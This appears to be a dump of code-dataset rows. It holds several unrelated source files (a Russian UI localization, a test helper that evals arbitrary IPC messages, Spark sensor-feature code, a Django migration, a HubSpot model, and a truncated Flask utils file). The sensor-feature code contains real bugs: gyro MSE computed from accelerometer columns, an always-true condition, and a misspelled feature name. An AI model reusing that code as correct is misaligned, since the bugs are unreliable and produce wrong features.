content stringlengths 27 928k | path stringlengths 4 230 | size int64 27 928k | nl_text stringlengths 21 396k | nl_size int64 21 396k | nl_language stringlengths 2 3 | nl_language_score float64 0.04 1 |
|---|---|---|---|---|---|---|
# Generated by scripts/localization_gen.py
def _config_pretty_models(_, count):
ot = 'о'
if count == 1:
et = 'ь'
ot = 'а'
elif count in [2, 3, 4]:
et = 'и'
else:
et = 'ей'
pretty = ['ноль', 'одна', 'две', 'три', 'четыре', 'пять', 'шесть']
count = pretty[count] if count < 7 else count
return 'Загружен{} {} модел{}'.format(ot, count, et)
LANG_CODE = {
'IETF': 'ru-RU',
'ISO': 'ru',
'aws': 'ru-RU',
}
YANDEX_EMOTION = {
'good': 'добрая',
'neutral': 'нейтральная',
'evil': 'злая',
}
YANDEX_SPEAKER = {
'jane': 'Джейн',
'oksana': 'Оксана',
'alyss': 'Алиса',
'omazh': 'Омар',
'zahar': 'Захар',
'ermil': 'Саня',
}
RHVOICE_SPEAKER = {
'anna': 'Аня',
'aleksandr': 'Александр',
'elena': 'Елена',
'irina': 'Ирина',
}
AWS_SPEAKER = {
'Tatyana': 'Татьяна',
'Maxim': 'Максим',
}
_LNG = {
# config.py
'Ошибка получения ключа для Yandex: {}': None,
'Ошибка сохранения {}: {}': None,
'Файл не найден (это нормально): {}': None,
'Ошибка загрузки {}: {}': None,
'Конфигурация сохранена за {}': None,
'Конфигурация сохранена!': None,
'Директория с моделями не найдена {}': None,
'Загружено {} моделей': _config_pretty_models,
'Файл настроек не найден по пути {}. Для первого запуска это нормально': None,
'Загружено {} опций за {}': None,
'Конфигурация загружена!': None,
'Ошибка инициализации языка {}: {}': None,
'Локализация {} загружена за {}': None,
'Конфигурация изменилась': None,
'Конфигурация не изменилась': None,
'Директория c tts кэшем не найдена {}': None,
'Удалены поврежденные файлы: {}': None,
'Размер tts кэша {}: {}': None,
'Ок.': None,
'Удаляем...': None,
'Удалено: {}': None,
'Удалено {} файлов. Новый размер TTS кэша {}': None,
'Директория {} не найдена. Создаю...': None,
# config.py terminal.py player.py
'Файл {} не найден.': None,
# config.py
'Это надо исправить!': None,
'Терминал еще не настроен, мой IP адрес: {}': None,
# listener.py stts.py
'Распознано за {}': None,
# listener.py
'Записано за {}': None,
'{} слушает': None,
'Голосовая активация по {}{}': None,
# loader.py
'Приветствую. Голосовой терминал настраивается, три... два... один...': None,
'Голосовой терминал завершает свою работу.': None,
# modules_manager.py
'Обычный': None,
# modules_manager.py modules.py
'Отладка': None,
# modules_manager.py
'Любой': None,
'восстановлен': None,
'удален': None,
'Отключенные модули: {}': None,
'Неактивные модули: {}': None,
'Активные модули: {}': None,
'Обнаружены конфликты в режиме {}: {}': None,
# modules_manager.py modules.py
'Вы ничего не сказали?': None,
# modules_manager.py
'Захвачено {}': None,
# terminal.py
'Пустая очередь? Impossible!': None,
'Получено {}:{}, lvl={} опоздание {} секунд.': None,
'{} Игнорирую.': None,
'Не верный вызов, WTF? {}:{}, lvl={}': None,
'Недопустимое значение: {}': None,
'Не настроено': None,
'Громкость {} процентов': None,
'Громкость музыки {} процентов': None,
'{} не поддерживает запись образцов.': None,
'первого': None,
'второго': None,
'третьего': None,
'Ошибка записи - недопустимый параметр': None,
'Запись {} образца на 5 секунд начнется после звукового сигнала': None,
'Запись {} образца завершена. Вы можете прослушать свою запись.': None,
'Ошибка сохранения образца {}: {}': None,
'Ошибка воспроизведения - файл {} не найден': None,
'{} не поддерживает тренировку моделей.': None,
' и еще {}': None,
'Ошибка компиляции - файлы {} не найдены в {}.': None,
'Ошибка компиляции - файлы не найдены.': None,
'Ошибка удаление модели номер {}': None,
'Модель номер {} удалена': None,
'Модель номер {} не найдена': None,
'Полный консенсус по модели {} не достигнут [{}/{}]. Советую пересоздать модель.': None,
'Полный консенсус по модели {} не достигнут. Компиляция отменена.': None,
'Компилирую {}': None,
'Ошибка компиляции модели {}: {}': None,
'Ошибка компиляции модели номер {}': None,
'Модель{} скомпилирована успешно за {}: {}': None,
'Модель{} номер {} скомпилирована успешно за {}': None,
# logger.py
'Логгирование в {} невозможно - отсутствуют права на запись. Исправьте это': None,
# modules.py
'блокировка': None,
'Блокировка снята': None,
'Блокировка включена': None,
'Блокировка': None,
'Включение/выключение блокировки терминала': None,
'выход': None,
'Внимание! Выход из режима разработчика': None,
'режим разработчика': None,
"Внимание! Включён режим разработчика. Для возврата в обычный режим скажите 'выход'": None,
'Режим настройки и отладки': None,
'Модуль {} не найден': None,
'Модуль {} системный, его нельзя настраивать': None,
'активировать': None,
'деактивировать': None,
'активировать везде': None,
'удалить': None,
'восстановить': None,
'Модуль {} удален. Вначале его нужно восстановить': None,
'Модуль {} уже в режиме {}': None,
'Теперь модуль {} доступен в режиме {}': None,
'Модуль {} и так {}': None,
'Модуль {} {}': None,
'Это невозможно, откуда тут {}': None,
'Менеджер': None,
'Управление модулями': None,
'Скажи': None,
'Произнесение фразы': None,
'Ничего': None,
'минус': None,
'плюс': None,
'до': None,
'от': None,
'Это слишком много для меня - считать {} чисел.': None,
'Я всё сосчитала': None,
'считалка': None,
'Считалка до числа. Или от числа до числа. Считалка произносит не больше 20 чисел за раз': None,
'сосчитай': None,
'считай': None,
'посчитай': None,
'Ошибка': None,
'Не поддерживается для {}': None,
' Я очень {}.': None,
'Меня зовут {}.{}': None,
'Кто я': None,
'Получение информации о настройках голосового генератора (только для Яндекса и RHVoice)': None,
'кто ты': None,
'какая ты': None,
'Теперь я': None,
'Изменение характера или голоса голосового генератора (только для Яндекса и RHVoice)': None,
'теперь ты': None,
'стань': None,
'Я уже {}.': None,
'Теперь меня зовут {}, а еще я {}.': None,
'без характера': None,
'Теперь я очень {} {}.': None,
'о': None,
'про': None,
'в': None,
'Ищу в вики о {}': None,
'Уточните свой вопрос: {}': None,
'Я ничего не знаю о {}.': None,
'Вики': None,
'Поиск в Википедии': None,
'расскажи': None,
'что ты знаешь': None,
'кто такой': None,
'что такое': None,
'зачем нужен': None,
'для чего': None,
'любую фразу': None,
'. Модуль удален': None,
'Модуль {} доступен в режиме {}. Для активации скажите {}. Модуль предоставляет {} {}': None,
'Скажите {}. Это активирует {}. Модуль предоставляет {}': None,
'Всего доступно {} модулей. Вот они:': None,
'Всего {} модулей удалены, это: {}': None,
'Работа модуля помощь завершена.': None,
'Помощь': None,
'Справку по модулям (вот эту)': None,
'помощь': None,
'справка': None,
'help': None,
'хелп': None,
'Come Along With Me.': None,
'Выход': None,
'Завершение работы голосового терминала': None,
'завершение работы': None,
'завершить работу': None,
'завершить': None,
'Терминал перезагрузится через 5... 4... 3... 2... 1...': None,
'Перезагрузка': None,
'Перезапуск голосового терминала': None,
'Ребут': None,
'Рестарт': None,
'reboot': None,
'громкость': None,
'Изменение громкости': None,
'громкость музыки': None,
'IP сервера не задан.': None,
'IP сервера не задан, исправьте это! Мой IP адрес: {}': None,
'Невозможно доставить - маршрут не найден': None,
'Скажи ': None,
'Мажордом': None,
'Отправку команд на сервер': None,
'Соответствие фразе не найдено: {}': None,
'Терминатор': None,
'Информацию что соответствие фразе не найдено': None,
# stts.py
'Неизвестный провайдер: {}': None,
'{} за {}{}: {}': None,
'{}найдено в кэше': None,
'{}сгенерированно {}': None,
"Ошибка синтеза речи от {}, ключ '{}'. ({})": None,
'Микрофоны не найдены': None,
'Доступны {}, от 0 до {}.': None,
'Не верный индекс микрофона {}. {}': None,
'Голос записан за {}': None,
'Во время записи произошел сбой, это нужно исправить': None,
'Ошибка распознавания - неизвестный провайдер {}': None,
'Для распознавания используем {}': None,
'Произошла ошибка распознавания': None,
"Ошибка распознавания речи от {}, ключ '{}'. ({})": None,
'Распознано: {}. Консенсус: {}': None,
'Привет': None,
'Слушаю': None,
'На связи': None,
'Привет-Привет': None,
'Я ничего не услышала': None,
'Вы ничего не сказали': None,
'Ничего не слышно': None,
'Не поняла': None,
'Ничего не слышно, повторите ваш запрос': None,
# notifier.py
'Запрос был успешен: {}': None,
'Ошибка коммуникации с сервером: {}': None,
# player.py
'Неизвестный тип файла: {}': None,
'Играю {} ...': None,
'Стримлю {} ...': None,
# updater.py
'Выполнен откат.': None,
'Во время обновления возникла ошибка': None,
'Вы используете последнюю версию терминала.': None,
'Файлы обновлены: {}': None,
'Терминал успешно обновлен.': None,
'Требуется перезапуск.': None,
'Во время обработки обновления или установки зависимостей возникла ошибка': None,
'Выполняется откат обновления.': None,
'Во время отката обновления возникла ошибка: {}': None,
'Откат невозможен.': None,
'Откат обновления выполнен успешно.': None,
'Зависимости {} {}обновлены: {}': None,
'не ': None,
# server.py
'Ошибка запуска сервера{}.': None,
' - адрес уже используется': None,
'Ошибка запуска сервера на {}:{}: {}': None,
# backup.py
'Запущено восстановление из бэкапа {}...': None,
'Восстановление не возможно: {}': None,
'Восстановление не удалось: {}': None,
'бэкап не создан': None,
'Восстановление завершено за {}, восстановлено {} файлов': None,
'Демон еще работает': None,
'Некорректное имя файла: {}': None,
'Файл не найден: {}': None,
'Архив поврежден: {}: {}': None,
'Ошибка создания бэкапа': None,
'Файл {} уже существует, отмена.': None,
'файл уже существует': None,
'Бэкап {} создан за {} [size: {}, compressed: {}, rate: {}%]': None,
'Бэкап успешно создан': None,
'Ошибка удаления старого бэкапа {}: {}': None,
'Удален старый бэкап {}': None,
# lib/base_music_controller.py
'Ошибка подключения к {}-серверу': None,
}
| src/languages/ru.py | 15,427 | Generated by scripts/localization_gen.py config.py config.py terminal.py player.py config.py listener.py stts.py listener.py loader.py modules_manager.py modules_manager.py modules.py modules_manager.py modules_manager.py modules.py modules_manager.py terminal.py logger.py modules.py stts.py notifier.py player.py updater.py server.py backup.py lib/base_music_controller.py | 374 | ar | 0.10459 |
"""
A script that simulates a Python shell and accepts arbitrary commands to
execute. For use by service tests.
| Copyright 2017-2022, Voxel51, Inc.
| `voxel51.com <https://voxel51.com/>`_
|
"""
import os
os.environ["FIFTYONE_DISABLE_SERVICES"] = "1"
from fiftyone.service.ipc import IPCServer
env = {}
def handle_message(message):
try:
code = compile(message, "", "eval")
except SyntaxError:
code = compile(message, "", "exec")
return eval(code, env)
IPCServer(handle_message).serve_forever()
| tests/utils/interactive_python.py | 530 | A script that simulates a Python shell and accepts arbitrary commands to
execute. For use by service tests.
| Copyright 2017-2022, Voxel51, Inc.
| `voxel51.com <https://voxel51.com/>`_
| | 187 | en | 0.812326 |
from typing import List
import numpy as np
import pandas as pd
from pyspark.sql.functions import pandas_udf, PandasUDFType
from pyspark.sql.types import *
# from pyspark.sql.functions import pandas_udf,PandasUDFType
from pyspark.sql.types import StructType
from cerebralcortex.core.datatypes import DataStream
from cerebralcortex.core.metadata_manager.stream.metadata import Metadata
def compute_corr_mse_accel_gyro(self, exclude_col_names: list = [],
accel_column_names: list = ['accelerometer_x', 'accelerometer_y', 'accelerometer_z'],
gyro_column_names: list = ['gyroscope_y', 'gyroscope_x', 'gyroscope_z'],
windowDuration: int = None,
slideDuration: int = None,
groupByColumnName: List[str] = [], startTime=None):
"""
Compute correlation and mean standard error of accel and gyro sensors
Args:
exclude_col_names list(str): name of the columns on which features should not be computed
accel_column_names list(str): name of accel data column
gyro_column_names list(str): name of gyro data column
windowDuration (int): duration of a window in seconds
slideDuration (int): slide duration of a window
groupByColumnName List[str]: groupby column names, for example, groupby user, col1, col2
startTime (datetime): The startTime is the offset with respect to 1970-01-01 00:00:00 UTC with which to start window intervals. For example, in order to have hourly tumbling windows that start 15 minutes past the hour, e.g. 12:15-13:15, 13:15-14:15... provide startTime as 15 minutes. First time of data will be used as startTime if none is provided
Returns:
DataStream object with all the existing data columns and FFT features
"""
feature_names = ["ax_ay_corr", 'ax_az_corr', 'ay_az_corr', 'gx_gy_corr', 'gx_gz_corr',
'gy_gz_corr', 'ax_ay_mse', 'ax_az_mse', 'ay_az_mse', 'gx_gy_mse', 'gx_gz_mse', 'gy_gz_mse']
exclude_col_names.extend(["timestamp", "localtime", "user", "version"])
data = self._data.drop(*exclude_col_names)
basic_schema = StructType([
StructField("timestamp", TimestampType()),
StructField("localtime", TimestampType()),
StructField("user", StringType()),
StructField("version", IntegerType()),
StructField("start_time", TimestampType()),
StructField("end_time", TimestampType())
])
features_list = []
for fn in feature_names:
features_list.append(StructField(fn, FloatType(), True))
features_schema = StructType(basic_schema.fields + features_list)
@pandas_udf(features_schema, PandasUDFType.GROUPED_MAP)
def get_corr_mse_features_udf(df):
timestamp = df['timestamp'].iloc[0]
localtime = df['localtime'].iloc[0]
user = df['user'].iloc[0]
version = df['version'].iloc[0]
start_time = timestamp
end_time = df['timestamp'].iloc[-1]
ax_ay_corr = df[accel_column_names[0]].corr(df[accel_column_names[1]])
ax_az_corr = df[accel_column_names[0]].corr(df[accel_column_names[2]])
ay_az_corr = df[accel_column_names[1]].corr(df[accel_column_names[2]])
gx_gy_corr = df[gyro_column_names[0]].corr(df[gyro_column_names[1]])
gx_gz_corr = df[gyro_column_names[0]].corr(df[gyro_column_names[2]])
gy_gz_corr = df[gyro_column_names[1]].corr(df[gyro_column_names[2]])
ax_ay_mse = ((df[accel_column_names[0]] - df[accel_column_names[1]]) ** 2).mean()
ax_az_mse = ((df[accel_column_names[0]] - df[accel_column_names[2]]) ** 2).mean()
ay_az_mse = ((df[accel_column_names[1]] - df[accel_column_names[2]]) ** 2).mean()
gx_gy_mse = ((df[accel_column_names[0]] - df[accel_column_names[1]]) ** 2).mean()
gx_gz_mse = ((df[accel_column_names[0]] - df[accel_column_names[2]]) ** 2).mean()
gy_gz_mse = ((df[accel_column_names[1]] - df[accel_column_names[2]]) ** 2).mean()
basic_df = pd.DataFrame([[timestamp, localtime, user, int(version), start_time, end_time, ax_ay_corr,
ax_az_corr, ay_az_corr, gx_gy_corr, gx_gz_corr, gy_gz_corr, ax_ay_mse, ax_az_mse,
ay_az_mse, gx_gy_mse, gx_gz_mse, gy_gz_mse]],
columns=['timestamp', 'localtime', 'user', 'version', 'start_time', 'end_time',
"ax_ay_corr", 'ax_az_corr', 'ay_az_corr', 'gx_gy_corr', 'gx_gz_corr',
'gy_gz_corr', 'ax_ay_mse', 'ax_az_mse', 'ay_az_mse', 'gx_gy_mse',
'gx_gz_mse', 'gy_gz_mse'])
return basic_df
data = self.compute(get_corr_mse_features_udf, windowDuration=windowDuration, slideDuration=slideDuration,
groupByColumnName=groupByColumnName, startTime=startTime)
return DataStream(data=data._data, metadata=Metadata())
def compute_fourier_features(self, exclude_col_names: list = [],
feature_names=["fft_centroid", 'fft_spread', 'spectral_entropy',
'spectral_entropy_old', 'fft_flux',
'spectral_falloff'], windowDuration: int = None,
slideDuration: int = None,
groupByColumnName: List[str] = [], startTime=None):
"""
Transforms data from time domain to frequency domain.
Args:
exclude_col_names list(str): name of the columns on which features should not be computed
feature_names list(str): names of the features. Supported features are fft_centroid, fft_spread, spectral_entropy, spectral_entropy_old, fft_flux, spectral_falloff
windowDuration (int): duration of a window in seconds
slideDuration (int): slide duration of a window
groupByColumnName List[str]: groupby column names, for example, groupby user, col1, col2
startTime (datetime): The startTime is the offset with respect to 1970-01-01 00:00:00 UTC with which to start window intervals. For example, in order to have hourly tumbling windows that start 15 minutes past the hour, e.g. 12:15-13:15, 13:15-14:15... provide startTime as 15 minutes. First time of data will be used as startTime if none is provided
Returns:
DataStream object with all the existing data columns and FFT features
"""
eps = 0.00000001
exclude_col_names.extend(["timestamp", "localtime", "user", "version"])
data = self._data.drop(*exclude_col_names)
df_column_names = data.columns
basic_schema = StructType([
StructField("timestamp", TimestampType()),
StructField("localtime", TimestampType()),
StructField("user", StringType()),
StructField("version", IntegerType()),
StructField("start_time", TimestampType()),
StructField("end_time", TimestampType())
])
features_list = []
for cn in df_column_names:
for sf in feature_names:
features_list.append(StructField(cn + "_" + sf, FloatType(), True))
features_schema = StructType(basic_schema.fields + features_list)
def stSpectralCentroidAndSpread(X, fs):
"""Computes spectral centroid of frame (given abs(FFT))"""
ind = (np.arange(1, len(X) + 1)) * (fs / (2.0 * len(X)))
Xt = X.copy()
Xt = Xt / Xt.max()
NUM = np.sum(ind * Xt)
DEN = np.sum(Xt) + eps
# Centroid:
C = (NUM / DEN)
# Spread:
S = np.sqrt(np.sum(((ind - C) ** 2) * Xt) / DEN)
# Normalize:
C = C / (fs / 2.0)
S = S / (fs / 2.0)
return (C, S)
def stSpectralFlux(X, Xprev):
"""
Computes the spectral flux feature of the current frame
ARGUMENTS:
X: the abs(fft) of the current frame
Xpre: the abs(fft) of the previous frame
"""
# compute the spectral flux as the sum of square distances:
sumX = np.sum(X + eps)
sumPrevX = np.sum(Xprev + eps)
F = np.sum((X / sumX - Xprev / sumPrevX) ** 2)
return F
def stSpectralRollOff(X, c, fs):
"""Computes spectral roll-off"""
totalEnergy = np.sum(X ** 2)
fftLength = len(X)
Thres = c * totalEnergy
# Ffind the spectral rolloff as the frequency position where the respective spectral energy is equal to c*totalEnergy
CumSum = np.cumsum(X ** 2) + eps
[a, ] = np.nonzero(CumSum > Thres)
if len(a) > 0:
mC = np.float64(a[0]) / (float(fftLength))
else:
mC = 0.0
return (mC)
def stSpectralEntropy(X, numOfShortBlocks=10):
"""Computes the spectral entropy"""
L = len(X) # number of frame samples
Eol = np.sum(X ** 2) # total spectral energy
subWinLength = int(np.floor(L / numOfShortBlocks)) # length of sub-frame
if L != subWinLength * numOfShortBlocks:
X = X[0:subWinLength * numOfShortBlocks]
subWindows = X.reshape(subWinLength, numOfShortBlocks,
order='F').copy() # define sub-frames (using matrix reshape)
s = np.sum(subWindows ** 2, axis=0) / (Eol + eps) # compute spectral sub-energies
En = -np.sum(s * np.log2(s + eps)) # compute spectral entropy
return En
def spectral_entropy(data, sampling_freq, bands=None):
psd = np.abs(np.fft.rfft(data)) ** 2
psd /= np.sum(psd) # psd as a pdf (normalised to one)
if bands is None:
power_per_band = psd[psd > 0]
else:
freqs = np.fft.rfftfreq(data.size, 1 / float(sampling_freq))
bands = np.asarray(bands)
freq_limits_low = np.concatenate([[0.0], bands])
freq_limits_up = np.concatenate([bands, [np.Inf]])
power_per_band = [np.sum(psd[np.bitwise_and(freqs >= low, freqs < up)])
for low, up in zip(freq_limits_low, freq_limits_up)]
power_per_band = power_per_band[power_per_band > 0]
return -np.sum(power_per_band * np.log2(power_per_band))
def fourier_features_pandas_udf(data, frequency: float = 16.0):
Fs = frequency # the sampling freq (in Hz)
results = []
# fourier transforms!
# data_fft = abs(np.fft.rfft(data))
X = abs(np.fft.fft(data))
nFFT = int(len(X) / 2) + 1
X = X[0:nFFT] # normalize fft
X = X / len(X)
if "fft_centroid" or "fft_spread" in feature_names:
C, S = stSpectralCentroidAndSpread(X, Fs) # spectral centroid and spread
if "fft_centroid" in feature_names:
results.append(C)
if "fft_spread" in feature_names:
results.append(S)
if "spectral_entropy" in feature_names:
se = stSpectralEntropy(X) # spectral entropy
results.append(se)
if "spectral_entropy_old" in feature_names:
se_old = spectral_entropy(X, frequency) # spectral flux
results.append(se_old)
if "fft_flux" in feature_names:
flx = stSpectralFlux(X, X.copy()) # spectral flux
results.append(flx)
if "spectral_folloff" in feature_names:
roff = stSpectralRollOff(X, 0.90, frequency) # spectral rolloff
results.append(roff)
return pd.Series(results)
@pandas_udf(features_schema, PandasUDFType.GROUPED_MAP)
def get_fft_features(df):
timestamp = df['timestamp'].iloc[0]
localtime = df['localtime'].iloc[0]
user = df['user'].iloc[0]
version = df['version'].iloc[0]
start_time = timestamp
end_time = df['timestamp'].iloc[-1]
df.drop(exclude_col_names, axis=1, inplace=True)
df_ff = df.apply(fourier_features_pandas_udf)
df3 = df_ff.T
pd.set_option('display.max_colwidth', -1)
# split column into multiple columns
# df3 = pd.DataFrame(df_ff.values.tolist(), index=df_ff.index)
# print("**"*50)
# print(type(df), type(df_ff), type(df3))
# print(df)
# print(df_ff)
# print(df_ff.values.tolist())
# print(df3)
# print("**" * 50)
# print("FEATURE-NAMES", feature_names)
df3.columns = feature_names
# multiple rows to one row
output = df3.unstack().to_frame().sort_index(level=1).T
output.columns = [f'{j}_{i}' for i, j in output.columns]
basic_df = pd.DataFrame([[timestamp, localtime, user, int(version), start_time, end_time]],
columns=['timestamp', 'localtime', 'user', 'version', 'start_time', 'end_time'])
# df.insert(loc=0, columns=, value=basic_cols)
return basic_df.assign(**output)
return self.compute(get_fft_features, windowDuration=windowDuration, slideDuration=slideDuration,
groupByColumnName=groupByColumnName, startTime=startTime) | cerebralcortex/markers/brushing/features.py | 13,159 | Compute correlation and mean standard error of accel and gyro sensors
Args:
exclude_col_names list(str): name of the columns on which features should not be computed
accel_column_names list(str): name of accel data column
gyro_column_names list(str): name of gyro data column
windowDuration (int): duration of a window in seconds
slideDuration (int): slide duration of a window
groupByColumnName List[str]: groupby column names, for example, groupby user, col1, col2
startTime (datetime): The startTime is the offset with respect to 1970-01-01 00:00:00 UTC with which to start window intervals. For example, in order to have hourly tumbling windows that start 15 minutes past the hour, e.g. 12:15-13:15, 13:15-14:15... provide startTime as 15 minutes. First time of data will be used as startTime if none is provided
Returns:
DataStream object with all the existing data columns and FFT features
Transforms data from time domain to frequency domain.
Args:
exclude_col_names list(str): name of the columns on which features should not be computed
feature_names list(str): names of the features. Supported features are fft_centroid, fft_spread, spectral_entropy, spectral_entropy_old, fft_flux, spectral_falloff
windowDuration (int): duration of a window in seconds
slideDuration (int): slide duration of a window
groupByColumnName List[str]: groupby column names, for example, groupby user, col1, col2
startTime (datetime): The startTime is the offset with respect to 1970-01-01 00:00:00 UTC with which to start window intervals. For example, in order to have hourly tumbling windows that start 15 minutes past the hour, e.g. 12:15-13:15, 13:15-14:15... provide startTime as 15 minutes. First time of data will be used as startTime if none is provided
Returns:
DataStream object with all the existing data columns and FFT features
Computes spectral centroid of frame (given abs(FFT))
Computes the spectral entropy
Computes the spectral flux feature of the current frame
ARGUMENTS:
X: the abs(fft) of the current frame
Xpre: the abs(fft) of the previous frame
Computes spectral roll-off
from pyspark.sql.functions import pandas_udf,PandasUDFType Centroid: Spread: Normalize: compute the spectral flux as the sum of square distances: Ffind the spectral rolloff as the frequency position where the respective spectral energy is equal to c*totalEnergy number of frame samples total spectral energy length of sub-frame define sub-frames (using matrix reshape) compute spectral sub-energies compute spectral entropy psd as a pdf (normalised to one) the sampling freq (in Hz) fourier transforms! data_fft = abs(np.fft.rfft(data)) normalize fft spectral centroid and spread spectral entropy spectral flux spectral flux spectral rolloff split column into multiple columns df3 = pd.DataFrame(df_ff.values.tolist(), index=df_ff.index) print("**"*50) print(type(df), type(df_ff), type(df3)) print(df) print(df_ff) print(df_ff.values.tolist()) print(df3) print("**" * 50) print("FEATURE-NAMES", feature_names) multiple rows to one row df.insert(loc=0, columns=, value=basic_cols) | 3,155 | en | 0.688298 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('addressbook', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='address',
name='country',
field=models.CharField(max_length=3, verbose_name='country'),
),
]
| addressbook/migrations/0002_auto_20150903_2227.py | 420 | -*- coding: utf-8 -*- | 21 | en | 0.767281 |
# coding: utf-8
"""
Files
Upload and manage files. # noqa: E501
The version of the OpenAPI document: v3
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from hubspot.files.files.configuration import Configuration
class NextPage(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {"after": "str", "link": "str"}
attribute_map = {"after": "after", "link": "link"}
def __init__(self, after=None, link=None, local_vars_configuration=None): # noqa: E501
"""NextPage - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._after = None
self._link = None
self.discriminator = None
self.after = after
if link is not None:
self.link = link
@property
def after(self):
"""Gets the after of this NextPage. # noqa: E501
:return: The after of this NextPage. # noqa: E501
:rtype: str
"""
return self._after
@after.setter
def after(self, after):
"""Sets the after of this NextPage.
:param after: The after of this NextPage. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and after is None: # noqa: E501
raise ValueError("Invalid value for `after`, must not be `None`") # noqa: E501
self._after = after
@property
def link(self):
"""Gets the link of this NextPage. # noqa: E501
:return: The link of this NextPage. # noqa: E501
:rtype: str
"""
return self._link
@link.setter
def link(self, link):
"""Sets the link of this NextPage.
:param link: The link of this NextPage. # noqa: E501
:type: str
"""
self._link = link
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items()))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, NextPage):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, NextPage):
return True
return self.to_dict() != other.to_dict()
| hubspot/files/files/models/next_page.py | 3,697 | NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Returns true if both objects are equal
NextPage - a model defined in OpenAPI
Returns true if both objects are not equal
For `print` and `pprint`
Gets the after of this NextPage. # noqa: E501
:return: The after of this NextPage. # noqa: E501
:rtype: str
Sets the after of this NextPage.
:param after: The after of this NextPage. # noqa: E501
:type: str
Gets the link of this NextPage. # noqa: E501
:return: The link of this NextPage. # noqa: E501
:rtype: str
Sets the link of this NextPage.
:param link: The link of this NextPage. # noqa: E501
:type: str
Returns the model properties as a dict
Returns the string representation of the model
Files
Upload and manage files. # noqa: E501
The version of the OpenAPI document: v3
Generated by: https://openapi-generator.tech
coding: utf-8 noqa: F401 noqa: E501 noqa: E501 noqa: E501 noqa: E501 | 982 | en | 0.724929 |
import os
import sys
import pandas as pd
import numpy as np
import pdb
import torch
import torch.nn as nn
import torch.nn.functional as F
sys.path.insert(1,"../")
sys.path.insert(1,"../../")
sys.path.insert(1,"../../../")
sys.path.insert(1,"../../../../")
sys.path.insert(1,"../../../../../")
from config_u import base
from data_generators import cpmg_generator_1A
from load_fully_quantified_cpmg_data import fq_v_ppm_spectra, fq_v_spectra, fq_v_statistics, fq_v_quant, fq_v_class_labels, fq_v_metabolite_names, fq_v_fold_dct, SEED
from metabolite_mapping import dataset2folder, folder2dataset
# task configuration
task = "gaba"
dataset_task = folder2dataset[task]
task_target_idx = fq_v_metabolite_names.index(dataset_task)
# data configuration
ppm_spectra = fq_v_ppm_spectra
spectra = fq_v_spectra
statistics = fq_v_statistics
quant = fq_v_quant[:,task_target_idx].reshape((-1,1))
class_labels = fq_v_class_labels
metabolite_names = [fq_v_metabolite_names[task_target_idx]]
fold_dct = fq_v_fold_dct
K = 5
generator = cpmg_generator_1A
# save and log configuration
model_name = f"full_ppm_spectrum_network_per_metabolite/{task}/seed_{SEED}/"
model_base_path = os.path.join(base, "models/cpmg/automated_metabolite_quantification/"+model_name)
log_base_path = os.path.join(base, "logs/cpmg/automated_metabolite_quantification/"+model_name)
plot_base_path = os.path.join(base, "plots/cpmg/automated_metabolite_quantification/"+model_name)
# neural network model configuration
num_epochs = 2000
weight_seed = SEED
hp_space = {
"ETA": 10**-2.1,
"weight_decay": 0.00001
}
# gpu/cpu device selection
gpu_id = int(input("GPU index: "))
if torch.cuda.is_available():
device = torch.device(f"cuda:{gpu_id}")
print(f"GPU {gpu_id} is available")
else:
device = torch.device("cpu")
print("GPU is not available")
# Quantification model
class Model(nn.Module):
def __init__(self):
super(Model, self).__init__()
self.all_mutual = nn.Linear(1401, 192)
self.m1 = nn.Linear(192,1)
def forward(self, x):
inp = F.relu(self.all_mutual(x))
m1 = F.relu(self.m1(inp)).squeeze()
return m1
# weight initialization
def initialize_weights(m):
if type(m) == nn.Linear:
torch.nn.init.kaiming_uniform_(m.weight)
m.bias.data.fill_(0.01)
# measurement metric and timing storage
metric_names = ["mae", "mse", "mape", "r2", "absolute_percentage_error"]
metrics = {}
for name in metric_names:
metrics[name] = {}
for metabolite_name in metabolite_names:
metrics[name][metabolite_name] = []
timing_mode = ["train", "test"]
runtime = {}
for mode in timing_mode:
runtime[mode] = [] | train_with_your_data/scripts/cpmg/automated_metabolite_quantification/full_ppm_spectrum_network_per_metabolite/gaba/config.py | 2,758 | task configuration data configuration save and log configuration neural network model configuration gpu/cpu device selection Quantification model weight initialization measurement metric and timing storage | 205 | en | 0.697076 |
from flask import session, jsonify, redirect, request, Response, abort
from flask_login import current_user
from werkzeug.utils import secure_filename
from functools import wraps
from srht.objects import User
from srht.database import db, Base
from srht.config import _cfg
import json
import os
import urllib
import requests
import xml.etree.ElementTree as ET
import hashlib
def firstparagraph(text):
try:
para = text.index("\n\n")
return text[:para + 2]
except:
try:
para = text.index("\r\n\r\n")
return text[:para + 4]
except:
return text
def with_session(f):
@wraps(f)
def go(*args, **kw):
try:
ret = f(*args, **kw)
db.commit()
return ret
except:
db.rollback()
db.close()
raise
return go
def loginrequired(f):
@wraps(f)
def wrapper(*args, **kwargs):
if not current_user or not current_user.approved:
return redirect("/login?return_to=" + urllib.parse.quote_plus(request.url))
else:
return f(*args, **kwargs)
return wrapper
def adminrequired(f):
@wraps(f)
def wrapper(*args, **kwargs):
if not current_user or not current_user.approved:
